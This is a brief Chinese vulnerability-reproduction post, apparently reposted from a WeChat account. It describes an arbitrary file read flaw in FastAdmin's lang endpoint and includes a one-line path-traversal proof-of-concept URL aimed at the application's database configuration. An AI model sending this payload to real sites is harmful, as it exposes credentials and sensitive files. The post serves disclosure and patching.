Fastadmin框架lang接口存在任意文件读取漏洞-(漏洞复现系列)

admin 2024年6月17日16:40:44评论50 views1字数 385阅读1分17秒阅读模式
免责声明:1.禁止未授权渗透测试2.该文章仅供学习参考,切勿拿去尝试3.此文所提供的信息而造成的任何后果及损失,均由使用者本人负责4.一切后果与文章作者无关5.文章所涉及的全部漏洞,均是被公开的

一.漏洞名称任意文件读取漏洞

漏洞描述

FastAdmin框架是一个基于ThinkPHP和Bootstrap的快速开发的后台管理系统框架。近期,FastAdmin框架被发现存在一个任意文件读取漏洞。这个漏洞允许攻击者利用系统的缺陷来获取系统敏感信息等。

三.漏洞等级:高危(自评)

四.漏洞证明:

4.1 漏洞poc:

http://127.0.0.1/index/ajax/lang?lang=../../application/database

Fastadmin框架lang接口存在任意文件读取漏洞-(漏洞复现系列)

Fastadmin框架lang接口存在任意文件读取漏洞-(漏洞复现系列)

Fastadmin框架lang接口存在任意文件读取漏洞-(漏洞复现系列)

五.修复建议:

升级补丁,修复漏洞

Fastadmin框架lang接口存在任意文件读取漏洞-(漏洞复现系列)

原文始发于微信公众号(漏洞谷):Fastadmin框架lang接口存在任意文件读取漏洞-(漏洞复现系列)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月17日16:40:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Fastadmin框架lang接口存在任意文件读取漏洞-(漏洞复现系列)http://cn-sec.com/archives/2856393.html

发表评论

匿名网友 填写信息